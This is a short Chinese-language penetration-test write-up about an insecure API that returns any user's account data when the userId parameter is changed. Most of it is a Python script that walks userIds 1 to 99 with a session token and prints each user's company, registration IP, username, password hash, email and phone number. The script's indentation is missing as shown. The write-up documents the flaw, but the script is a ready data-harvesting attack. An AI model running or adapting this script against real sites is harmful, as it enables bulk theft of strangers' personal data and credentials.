对一个网站进行渗透测试,登录后,点击“编辑信息”
查看请求数据,其中一条请求数据如下,系统通过userId值回显账号相关信息,其中涉及账号、hash密码、邮箱,手机号等一些敏感信息
尝试将userId值修改为1,成功回显他人账号信息
说明系统是存在api遍历的问题,编写python脚本遍历userId值,批量获取个人信息
脚本如下
import requests
from colorama import init,Fore
init(autoreset=True)
header = {
'Cookie':'xxx',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip, deflate',
'Token':'625390f4-1103-4923-84b6-92ef86e7141c',
'Referer':'https://xx/userCenter/manCore/manMassage',
'Sec-Fetch-Dest':'empty',
'Sec-Fetch-Mode':'cors',
'Sec-Fetch-Site':'same-origin',
'Te':'trailers',
'Connection':'close',
}
for i in range(1,100):
url = "https://xx/api/personal/detail?userId=%s" %i
try:
res = requests.get(url=url, headers=header)
text = res.json()
company = text.get("data").get("company")
ip = text.get("data").get("createIP")
name = text.get("data").get("userName")
password = text.get("data").get("password")
emil = text.get("data").get("emil")
phone = text.get("data").get("phone")
print(Fore.GREEN+"company:%s, 注册ip:%s, 账号:%s, 密码:%s, 邮箱:%s, 手机号:%s" %(company, ip, name, password, emil, phone))
except:
pass